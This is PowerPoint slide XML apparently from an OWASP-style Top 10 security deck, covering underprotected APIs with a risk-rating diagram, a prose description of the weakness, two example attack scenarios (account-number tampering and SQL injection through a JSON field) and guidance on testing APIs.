                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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1" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>A9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26545733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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1130590515"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="951722"/>
          <a:ext cx="6858000" cy="2553478"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="649591">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r>
              <a:tr h="396931">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>COMMON</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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>DIFFICULT</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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506956">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>nyone with the ability to send requests to your APIs. C</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>lient software is easily reversed and communications are easily intercepted, so obscurity is no defense for APIs.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers can reverse engineer APIs by examining client code, or simply monitoring communications. Some API vulnerabilities can be automatically discovered, others only by experts.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Modern web applications and APIs are increasingly composed of rich clients (browser, mobile, desktop) that connect to backend APIs (XML, JSON, RPC, GWT, custom). APIs (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>microservices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, services, endpoints) can be vulnerable to the full range of attacks. Unfortunately, dynamic and sometimes even static tools don’t work well on APIs, and they can be difficult to analyze manually, so these vulnerabilities are often undiscovered.</a:t>
                      </a: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p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> full range of negative outcomes is possible, including data theft, corruption, and destruction; unauthorized access to the entire application; and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>complete host takeover.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the impact of an API attack on the business. Does the API access critical data or functions? Many APIs are mission critical, so also consider the impact of denial of service attacks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="3383280" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Imagine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a mobile banking app that connects to an XML API at the bank for account information and performing transactions. The attacker reverse engineers the app and discovers that the user account number is passed as part of the authentication request to the server along with the username and password. The attacker sends legitimate credentials, but another user’s account number, gaining full access to the other user’s account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Imagine a public API offered by an Internet startup for automatically sending text messages. The API accepts JSON messages that contain a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transactionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” field. The API parses out this “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transactionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” value as a string and concatenates it into a SQL query, without escaping or parameterizing it. As you can see the API is just as susceptible to SQL injection as any other type of application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In either of these cases, the vendor may not provide a web UI to use these services, making security testing more difficult.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3581400"/>
            <a:ext cx="3383280" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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Am I Vulnerable to Attack?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing your APIs for vulnerabilities should be similar to testing the rest of your application for vulnerabilities. All the different types of injection, authentication, access control, encryption, configuration, and other issues can exist in APIs just as in a traditional application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However, because APIs are designed for use by programs (not humans) they frequently lack a UI and also use complex protocols and complex data structures. These factors can make security testing difficult. The use of widely-used formats can help, such as Swagger (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), REST, JSON, and XML. Some frameworks like GWT and some RPC implementations use custom formats. Some applications and APIs create their own protocol and data formats, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. The breadth and complexity of APIs make it difficult to automate effective security testing, possibly leading to a false sense of security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
